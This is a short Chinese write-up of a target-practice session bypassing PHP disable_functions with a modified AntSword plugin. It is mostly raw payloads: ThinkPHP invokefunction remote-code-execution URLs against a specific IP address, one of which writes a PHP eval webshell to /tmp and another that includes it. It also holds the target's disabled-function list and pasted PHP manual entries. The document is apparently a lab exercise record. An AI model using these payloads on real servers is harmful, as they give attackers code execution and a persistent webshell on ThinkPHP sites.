记一次魔改蚁剑bypass_disable_functions插件的打靶记录

?s=Index/thinkapp/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=-1

set_time_limit,ini_set,pcntl_alarm,pcntl_fork,pcntl_waitpid,pcntl_wait,pcntl_wifexited,pcntl_wifstopped,pcntl_wifsignaled,pcntl_wifcontinued,pcntl_wexitstatus,pcntl_wtermsig,pcntl_wstopsig,pcntl_signal,pcntl_signal_get_handler,pcntl_signal_dispatch,pcntl_get_last_error,pcntl_strerror,pcntl_sigprocmask,pcntl_sigwaitinfo,pcntl_sigtimedwait,pcntl_exec,pcntl_getpriority,pcntl_setpriority,pcntl_async_signals,system,exec,shell_exec,popen,proc_open,passthru,symlink,link,syslog,imap_open,ld,mail,putenv,error_log,dl,gc_collect_cycles,iconv,str_repeat,str_shuffle

http://1.117.101.154:30080/?s=index/thinkapp/invokefunction&function=call_user_func_array&vars[0]=file_put_contents&vars[1][]=/tmp/tw.php&vars[1][]=%3C%3Fphp%20echo(%22hello%20hacker%22)%3B%40eval(%24_POST%5B'tw'%5D)%3B%3F%3E

http://1.117.101.154:30080/?s=Index/thinkapp/invokefunction&function=call_user_func_array&vars[0]=think__include_file&vars[1][]=/tmp/tw.php

set_time_limit,ini_set,pcntl_alarm,pcntl_fork,pcntl_waitpid,pcntl_wait,pcntl_wifexited,pcntl_wifstopped,pcntl_wifsignaled,pcntl_wifcontinued,pcntl_wexitstatus,pcntl_wtermsig,pcntl_wstopsig,pcntl_signal,pcntl_signal_get_handler,pcntl_signal_dispatch,pcntl_get_last_error,pcntl_strerror,pcntl_sigprocmask,pcntl_sigwaitinfo,pcntl_sigtimedwait,pcntl_exec,pcntl_getpriority,pcntl_setpriority,pcntl_async_signals,system,exec,shell_exec,popen,proc_open,passthru,symlink,link,syslog,imap_open,ld,mail,putenv,error_log,dl,gc_collect_cycles,iconv,str_repeat,str_shuffle

#定义和用法str_repeat() 函数把字符串重复指定的次数。#语法str_repeat(string,repeat)#参数     描述string  必需。规定要重复的字符串。repeat  必需。规定字符串将被重复的次数。必须大于等于 0

#定义和用法str_shuffle() 函数随机打乱字符串中的所有字符。#语法str_shuffle(string)#参数    描述string  必需。规定要打乱的字符串。